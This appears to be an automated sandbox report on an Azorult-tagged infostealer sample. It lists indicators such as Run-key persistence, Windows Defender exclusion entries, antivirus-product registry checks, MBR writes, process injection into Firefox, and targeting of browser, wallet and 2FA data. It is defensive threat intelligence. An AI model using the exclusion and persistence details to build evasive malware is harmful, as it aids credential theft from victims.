azorult | 9adec0a415eb0d5aaa6141173e56500972978eb8aab8d90c558778e27b275023

System Information Discovery

Processes:

3931600.43

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3931600.43
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3931600.43

Checks computer location settings 2 TTPs 14 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

jg4_4jaa.execmd.exeProPlugin.execmd.execmd.execmd.exefnoy3fxu0qu.tmpcmd.execmd.execmd.execmd.exeS1FQC487S.exejfiag3g_gg.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	jg4_4jaa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	ProPlugin.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	fnoy3fxu0qu.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	S1FQC487S.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	jfiag3g_gg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 2 IoCs

Processes:

3931600.43Fai.com

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	3931600.43
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lvEGBwmEjv.url	Fai.com

Loads dropped DLL 64 IoCs

Processes:

MsiExec.exe2r2utnbvoam.tmpSetup3310.tmpvict.tmpvpn.tmpIBInstaller_97039.tmpSetup.tmpfnoy3fxu0qu.tmpProPlugin.tmpapp.exechrome.exeDelta.tmpzznote.tmpSetup.exemask_svc.exepatch.exeMaskVPNUpdate.exeSetup3310.tmpvict.tmpSetup.tmpProPlugin.tmpmain.exeDelta.tmpzznote.tmpSetup.exeSetup3310.tmpvict.tmp

pid	process
2084	MsiExec.exe
4712	2r2utnbvoam.tmp
4992	Setup3310.tmp
4992	Setup3310.tmp
5004	vict.tmp
4136	vpn.tmp
4136	vpn.tmp
4184	IBInstaller_97039.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
5672	Setup.tmp
5672	Setup.tmp
5872	fnoy3fxu0qu.tmp
5872	fnoy3fxu0qu.tmp
5872	fnoy3fxu0qu.tmp
5872	fnoy3fxu0qu.tmp
5872	fnoy3fxu0qu.tmp
5872	fnoy3fxu0qu.tmp
5872	fnoy3fxu0qu.tmp
6324	ProPlugin.tmp
6324	ProPlugin.tmp
2020	app.exe
6632	chrome.exe
4408	Delta.tmp
4408	Delta.tmp
5304	zznote.tmp
5304	zznote.tmp
5364	Setup.exe
5364	Setup.exe
4636	mask_svc.exe
4636	mask_svc.exe
4636	mask_svc.exe
4636	mask_svc.exe
4636	mask_svc.exe
4636	mask_svc.exe
4136	vpn.tmp
4136	vpn.tmp
4588	patch.exe
4588	patch.exe
4588	patch.exe
4588	patch.exe
7836	MaskVPNUpdate.exe
7836	MaskVPNUpdate.exe
4968	Setup3310.tmp
4968	Setup3310.tmp
6240	vict.tmp
7280	Setup.tmp
7280	Setup.tmp
7688	ProPlugin.tmp
7688	ProPlugin.tmp
3452	main.exe
5592	Delta.tmp
5592	Delta.tmp
5800	zznote.tmp
5800	zznote.tmp
5552	Setup.exe
5552	Setup.exe
6116	Setup3310.tmp
6116	Setup3310.tmp
6684	vict.tmp

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

Processes:

app.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\HolyCloud = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\app.exe = "0"	app.exe

themida 1 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral4/memory/5308-336-0x0000000000E00000-0x0000000000E01000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

gcttt.exe6844724.75S1FQC487S.exe3931600.43app.exemultitimer.exefnoy3fxu0qu.tmp

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gcttt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	6844724.75
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTDAQ899CCTTKB2 = "\"C:\\Program Files\\S1FQC487SD\\S1FQC487S.exe\""	S1FQC487S.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\3931600.43"	3931600.43
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\HolyCloud = "\"C:\\Windows\\rss\\csrss.exe\""	app.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\imucgagxcls = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\714DAPD36Q\\multitimer.exe\" 1 3.1615157622.604559767c3ad"	multitimer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\8493395 = "\"C:\\Users\\Admin\\AppData\\Roaming\\sfue5y3ixus\\fnoy3fxu0qu.exe\" /VERYSILENT"	fnoy3fxu0qu.tmp

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

Processes:

md2_2efs.exe3931600.43jg4_4jaa.exejg4_4jaa.exejg4_4jaa.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3931600.43
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg4_4jaa.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg4_4jaa.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg4_4jaa.exe

Drops Chrome extension 1 IoCs

Processes:

askinstall24.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fiogdnnnljjlfjgkifccooilblmjflkm\5.18.6_0\manifest.json	askinstall24.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 32 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
2049	ipinfo.io
2507	ipinfo.io
2575	ipinfo.io
61	api.ipify.org
101	ipinfo.io
507	ipinfo.io
1212	ipinfo.io
196	ipinfo.io
1199	ipinfo.io
184	checkip.amazonaws.com
209	ipinfo.io
1156	ipinfo.io
2065	ipinfo.io
457	ipinfo.io
2196	checkip.dyndns.org
417	ipinfo.io
2501	api.ipify.org
2804	checkip.amazonaws.com
2000	ipinfo.io
2620	ipinfo.io
2629	ipinfo.io
174	ipinfo.io
1218	ipinfo.io
1630	ipinfo.io
1733	ipinfo.io
96	ipinfo.io
1670	ipinfo.io
2567	checkip.amazonaws.com
153	ip-api.com
498	ipinfo.io
1743	ipinfo.io
2071	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

Setup.exeAD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	AD754B4D3FE2C4EE.exe
File opened for modification	\??\PhysicalDrive0	AD754B4D3FE2C4EE.exe

Drops file in System32 directory 25 IoCs

Processes:

powershell.exepowershell.exeDrvInst.exepowershell.exepowershell.exeMaskVPNUpdate.exepowershell.exetapinstall.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{52529621-384b-1f45-be64-3263e1301c32}\SETA03E.tmp	DrvInst.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	MaskVPNUpdate.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\DriverStore\Temp\{52529621-384b-1f45-be64-3263e1301c32}\SETA03E.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{52529621-384b-1f45-be64-3263e1301c32}\SETA040.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	tapinstall.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{52529621-384b-1f45-be64-3263e1301c32}\SETA03F.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{52529621-384b-1f45-be64-3263e1301c32}\SETA03F.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{52529621-384b-1f45-be64-3263e1301c32}	DrvInst.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{52529621-384b-1f45-be64-3263e1301c32}\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{52529621-384b-1f45-be64-3263e1301c32}\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{52529621-384b-1f45-be64-3263e1301c32}\SETA040.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{52529621-384b-1f45-be64-3263e1301c32}\tap0901.sys	DrvInst.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs

Processes:

Setup.exe3931600.43parse.exeparse.exeparse.exemask_svc.exemask_svc.exemask_svc.exe

pid	process
1744	Setup.exe
5308	3931600.43
7196	parse.exe
7268	parse.exe
7392	parse.exe
7392	parse.exe
7268	parse.exe
7196	parse.exe
7392	parse.exe
7268	parse.exe
7196	parse.exe
7392	parse.exe
7268	parse.exe
7196	parse.exe
7404	mask_svc.exe
7204	mask_svc.exe
4636	mask_svc.exe

Suspicious use of SetThreadContext 11 IoCs

Processes:

key.exeAD754B4D3FE2C4EE.exeD3EF.tmp.exeVenita.exe3901899.42Fai.comVenita.exeVenita.exeFai.comVenita.exe

description	pid	process	target process
PID 1128 set thread context of 2736	1128	key.exe	key.exe
PID 1124 set thread context of 4316	1124	AD754B4D3FE2C4EE.exe	firefox.exe
PID 1124 set thread context of 4624	1124	AD754B4D3FE2C4EE.exe	firefox.exe
PID 4456 set thread context of 4188	4456	D3EF.tmp.exe	D3EF.tmp.exe
PID 4108 set thread context of 6520	4108	Venita.exe	Venita.exe
PID 4264 set thread context of 5460	4264	3901899.42	3901899.42
PID 4232 set thread context of 5328	4232	Fai.com	Fai.com
PID 6728 set thread context of 2304	6728	Venita.exe	Venita.exe
PID 6652 set thread context of 8604	6652	Venita.exe	Venita.exe
PID 2456 set thread context of 8732	2456	Fai.com	Fai.com
PID 5132 set thread context of 5604	5132	Venita.exe	Venita.exe

Drops file in Program Files directory 64 IoCs

Processes:

IBInstaller_97039.tmpvpn.tmp2r2utnbvoam.tmpsroql3gh1oa.exe7za.exeapp.exeapp.exechashepro3.tmpchashepro3.tmp7za.exevict.tmpchashepro3.tmpMaskVPNUpdate.exevict.tmpchashepro3.tmpvict.tmp

description	ioc	process
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-PS974.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-HF8FN.tmp	2r2utnbvoam.tmp
File created	C:\Program Files (x86)\MaskVPN\is-6S2IF.tmp	vpn.tmp
File created	C:\Program Files\S1FQC487SD\uninstaller.exe.config	sroql3gh1oa.exe
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-57A19.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Floral-Hill\winamp.exe	7za.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	vpn.tmp
File created	C:\Program Files\S1FQC487SD\uninstaller.exe	sroql3gh1oa.exe
File created	C:\Program Files (x86)\MaskVPN\is-LI842.tmp	vpn.tmp
File created	C:\Program Files (x86)\Floral-Hill\7zxa.dll	app.exe
File created	C:\Program Files (x86)\Floral-Hill\NalDrv.sys	app.exe
File opened for modification	C:\Program Files (x86)\JCleaner\8.exe	chashepro3.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-K2CKT.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-TEFVT.tmp	vpn.tmp
File created	C:\Program Files (x86)\Floral-Hill\winamp.exe	7za.exe
File created	C:\Program Files (x86)\JCleaner\is-57VS1.tmp	chashepro3.tmp
File created	C:\Program Files (x86)\MaskVPN\is-8668D.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Floral-Hill\winamp.exe	7za.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-OMN57.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Floral-Hill\winamp.7z	app.exe
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Venita.exe	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Venita.exe	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Interop.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\JCleaner\is-3KK9O.tmp	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\version	MaskVPNUpdate.exe
File opened for modification	C:\Program Files (x86)\JCleaner\8.exe	chashepro3.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-7QD8E.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-B540D.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-T4V5G.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-J57G7.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-22KOL.tmp	vpn.tmp
File created	C:\Program Files (x86)\Floral-Hill\help.txt	app.exe
File created	C:\Program Files (x86)\MaskVPN\is-H7VTL.tmp	vpn.tmp
